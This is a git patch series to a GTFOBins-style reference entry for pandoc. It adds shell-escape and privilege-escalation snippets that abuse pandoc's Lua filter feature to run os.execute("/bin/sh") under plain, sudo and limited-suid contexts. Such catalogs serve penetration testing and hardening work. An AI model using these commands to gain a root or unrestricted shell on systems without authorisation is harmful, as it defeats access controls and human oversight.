From 7cb2fcb3754db966125c1d666212750ed4028736 Mon Sep 17 00:00:00 2001
From: Alvin Nguyen <alvinonguyen00@gmail.com>
Date: Mon, 4 Sep 2023 00:30:36 -0700
Subject: [PATCH 1/2] Update pandoc.md

---
 _gtfobins/pandoc.md | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/_gtfobins/pandoc.md b/_gtfobins/pandoc.md
index 4da3f74f..fe66c66e 100644
--- a/_gtfobins/pandoc.md
+++ b/_gtfobins/pandoc.md
@@ -8,12 +8,20 @@ functions:
     - code: |
         LFILE=file_to_write
         echo DATA | pandoc -t plain -o "$LFILE"
+  shell:
+    - description: |
+        Pandoc has a builtin Lua interpreter for writing filters.
+    - code: |
+        TF=$(mktemp)
+        echo 'os.execute("/bin/sh")' > $TF
+        pandoc -L $TF /dev/null
   suid:
     - code: |
         LFILE=file_to_write
         echo DATA | ./pandoc -t plain -o "$LFILE"
   sudo:
     - code: |
-        LFILE=file_to_write
-        echo DATA | sudo pandoc -t plain -o "$LFILE"
+        TF=$(mktemp)
+        echo 'os.execute("/bin/sh")' > $TF
+        sudo pandoc -L $TF /dev/null
 ---

From 56710ccb4750abc8da3d3807e1cba5614afdf65c Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sat, 23 Dec 2023 13:57:30 +0100
Subject: [PATCH 2/2] Fixup

---
 _gtfobins/pandoc.md | 18 ++++++++++++------
 1 file changed, 12 insertions(+), 6 deletions(-)

diff --git a/_gtfobins/pandoc.md b/_gtfobins/pandoc.md
index fe66c66e..70c77bd7 100644
--- a/_gtfobins/pandoc.md
+++ b/_gtfobins/pandoc.md
@@ -9,19 +9,25 @@ functions:
         LFILE=file_to_write
         echo DATA | pandoc -t plain -o "$LFILE"
   shell:
-    - description: |
-        Pandoc has a builtin Lua interpreter for writing filters.
-    - code: |
+    - description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
+      code: |
         TF=$(mktemp)
-        echo 'os.execute("/bin/sh")' > $TF
+        echo 'os.execute("/bin/sh")' >$TF
         pandoc -L $TF /dev/null
   suid:
     - code: |
         LFILE=file_to_write
         echo DATA | ./pandoc -t plain -o "$LFILE"
+  limited-suid:
+    - description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
+      code: |
+        TF=$(mktemp)
+        echo 'os.execute("/bin/sh")' >$TF
+        ./pandoc -L $TF /dev/null
   sudo:
-    - code: |
+    - description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
+      code: |
         TF=$(mktemp)
-        echo 'os.execute("/bin/sh")' > $TF
+        echo 'os.execute("/bin/sh")' >$TF
         sudo pandoc -L $TF /dev/null
 ---